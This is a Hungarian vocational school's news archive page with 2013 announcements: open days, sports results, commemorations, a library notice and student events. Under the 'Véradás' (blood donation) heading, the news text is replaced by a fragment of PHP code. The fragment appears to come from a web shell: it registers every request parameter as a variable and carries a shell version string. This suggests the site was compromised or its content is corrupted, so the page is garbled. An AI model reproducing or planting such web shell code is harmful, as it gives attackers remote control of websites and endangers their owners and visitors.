vissza1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 [40] 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 előre
Fogadóóra
Tisztelt Szülők! Tájékoztatásul közöljük, hogy iskolánk 2013. december 9-én 1500 és 1700 óra között fogadóórát tart. Számítunk megjelenésükre!  
Felvételi tájékoztató
Itt olvashatók tagozatkódokkal a középiskolai jelentkezéshez szükséges legfontosabb tudnivalók.  
Hivatalok napja
2013. november 28-án Hivatalok napja elnevezéssel országszerte nyílt napot tartottak a megyei és fővárosi kormányhivatalok. Ebből az alkalomból iskolánk két osztálya (10. A és a 12. A osztály) rendhagyó osztályfőnöki óra
Iskola bemutatása
Iskolánk a nyílt napon kívül is lehetőséget biztosít arra, hogy a nyolcadik osztályosok jobban megismerjék iskolánkat. Előzetes időpont egyeztetés után rendhagyó osztályfőnöki órák keretében szívesen bemutatjuk intézményünket, képzési kínálatunkat, felszereltségünket,
Nyílt nap
Iskolánk nyílt napjára 2013. november 21-én, csütörtökön került sor. A késői időpontot a szakmaszerkezeti döntés elhúzódása okozta. A korábbi évek gyakorlatához képest változás volt, hogy a nyílt nap lebonyolítására 11 órától
Képzési Vásár
2013. november 7-9. között került megrendezésre -a hagyományokhoz híven - Szombathelyen a Pályainfo az Oladi Általános Művelődési Központban. A pályaválasztást elősegítő rendezvényen iskolánk is képviseltette magát.
SPAR Kiváló Tanulója Verseny
Az idei évben is megrendezésre került a SPAR Kiváló Tanulója Verseny, a kereskedelmi egységnél szakmai gyakorlatot teljesítő szakiskolai tanulók körében. Közel 100 élelmiszer- és vegyiáru-eladói képzésben részt vevő tanuló jelentkezett
Szakszervezeti sportnap
2013. október 24-én Szombathelyen rendezték meg a megyei szakszervezeti sportnapot. Iskolánkat két sportágban képviselték legügyesebb diákjaink, akik kosárlabdában és labdarúgásban is eredményesen szerepeltek   Kosarasaink az első mérkőzésüket elveszítették a vendéglátó Kereskedelmi és
Győzelemmel zárta kispályás labdarúgó csapatunk a Kölcsey Kupát!
A Kölcsey Ferenc Gimnáziumban megrendezett mini tornán a "Rázsós" fiúk mindkét mérkőzésüket megnyerve diadalmaskodtak a körmendi Kölcsey Gimnázium és a szentgotthárdi III. Béla Szakképző csapatai előtt.   Eredmények:          ?         Rázsó -
Az 56-os magyar forradalom és szabadságharc öröksége
"A magyar vér oly nagy értéke Európának és a szabadságnak, hogy óvnunk kell minden cseppjét."                                                  Albert Camus, francia filozófus gondolata Az 1956. október 23-a és november 4-e közötti napokban Magyarországon
150 ÉVE SZÜLETETT GÁRDONYI GÉZA
"ESKÜSZÖM, HOGY  OTT   LESZEK  MINDEN   VESZEDELEMBEN VELETEK !" Az Országgyűlés határozata alapján október 17-én a Gárdonyi Géza Emlékév keretében iskolánk is megemlékezett a 150 évvel ezelőtt született íróról és fő művéről.
NYÍLT NAP
Iskolánk 2013. november 21-én 11 órai kezdettel tartja nyílt napját, melyre minden érdeklődő 8. osztályost és szüleiket szeretettel várunk! Képzési kínálatunk a 2014/2015. tanévre: Szakközépiskolában: Ágazat (szakmacsoport) Szakmai kimenet (OKJ szerinti) Száma Megnevezése XXII. Közlekedésgépész 54 525 02 Autószerelő XXVI. Kereskedelem 54 345 01
Sportolási lehetőségek
Lányok- Fiúk figyelem! Új sportolási lehetőségek nyílnak iskolánkban, ahová szeretettel várunk minden mozogni vágyó, sportot kedvelő diákot! KONDI Felújított konditermeinkbe hétfőtől - csütörtökig az alábbi időpontokban biztosítunk testedzési lehetőséget: Hétfő: 13:40 - 15:10 Kedd: 12:45
Kacsaavató
2013. október 17-én kedd délután lezajlott a kacsaavató, melyet a 12/A osztály rendezett. Szerencsére az időjárás hozzájárult az avatáshoz, így mint minden évben az iskola udvarán történt meg a kacsák
Könyvtár
"A MŰVELTSÉG JÓ SORSBAN ÉKESSÉG, BALSORSBAN MENEDÉK." Arisztotelész     KEDVES OLVASÓK!    Iskolánk KÖNYVTÁRA szeretettel vár minden dolgozót, olvasni, művelődni vágyó diákot!  Állományunk gazdag kínálatában nemcsak a tanuláshoz szükséges tankönyvek lelhetők fel, hanem a szépirodalom klasszikusai,
Diákönkormányzat felhívásai
Kacsaavató Időpont: 2013.10.16.,szerda,  1300-1400 Helyszín: Iskola udvara Műsorvezető osztály: 12.A Kötelező viselet: 9.A à Láthatósági mellény,felmosó kanna (tanfelszerelésnek) 9/1 à Kockás ing, gumicsizma,babos kendő (piros,fehér pöttyös) 9/2 à Otthonka, nyakkendő Szeretettel várunk minden Rázsós diákot!!!   Biciklitúra 2013. október 18-án,
Témanap - Tanulmányi kirándulás
2013. október 9-én a kereskedelem-marketing és közlekedés szakmacsoport tanulói kiránduláson vettek részt. Az "Így is lehet tanulni - együttműködés gyermekeink kulturális tudásának erősítéséért" című, TÁMOP-3.2.13-12/1-2012-0208 azonosítójú projekt fenntartási kötelezettsége keretében
"Arad börtönében kísért a múlt..."
Ezzel a gondolattal emlékezett meg iskolánk az 1848-49-es forradalom és szabadságharc Aradi Vértanúiról. 164 évvel ezelőtt, 1849. október 6-án, Aradon kivégezték a szabadságharc 13 volt katonai vezetőjét. A megemlékezést 2013.
Rázsós projektek a freiburgi egyetemen
"RÁZSÓS" PROJEKTEK A FREIBURGI EGYETEMEN a tanártovábbképzésen résztvevő csoport számára       ELŐADÓ:     Kopasz Éva Mária német-angol szakos középiskolai tanár                     Rázsó Imre Szakközépiskola és Szakiskola Körmend HELYSZÍN: Albert-Ludwigs Universität, KG. I. 1222. Freiburg (Németország) IDŐPONT:   2013.
Véradás
$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = "1.0 pre-release build #13"; //Current version //CONFIGURATION AND SETTINGS if (!empty($unset_surl))

Elérhetőségeink:

Vas Megyei SZC Rázsó Imre Technikum
Cím: 9900 Körmend, Rákóczi u. 2.
Tel.: 94/594-077
e-mail:
titkarsag@razso.hu


Székhely: 9700 Szombathely, Akacs Mihály utca 8–10.

Képviseli: Rettegi Attila főigazgató

OM azonosító: 203062/007

Program

2024.április 19. péntek
HKSzCsPSzV
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30

Facebook



Pályázatok